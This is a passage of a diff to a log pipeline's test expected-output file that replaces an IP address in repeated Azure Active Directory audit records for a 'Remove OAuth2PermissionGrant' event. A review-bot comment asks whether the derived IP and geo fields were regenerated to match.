"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\
":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -9260,9 +9260,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:16:18", "ExtendedProperties": [ { 
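Review bot: The hunk swaps `"ActorIpAddress"` and `"ClientIP"` under `o365audit` to `67.43.156.15` in step with the raw `event.original` string in the hunk above, but nothing visible here shows whether the ECS fields this pipeline derives from them (`source.ip`, `client.ip`, `related.ip` and any geo enrichment keyed on the address) were regenerated for the same records; if this expected-output file was edited by text substitution rather than re-generated from the test input, those derived fields will still carry the old value and the pipeline test will diverge. The same applies to the hunks at `@@ -9526` and `@@ -9792`, which change the identical pair of keys for repeated copies of event `ec6ba716-ec04-460a-8d9e-661d732c4689`. Worth a glance at the regenerated file as a whole rather than at these hunks alone, and at whether the `CreationTime`/`env_time` values being identical across the three copies is intended fixture content or an accidental duplicate.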
@@ -9496,7 +9496,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\
":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\
":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -9526,9 +9526,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:16:18", "ExtendedProperties": [ { 
@@ -9762,7 +9762,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\
":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsof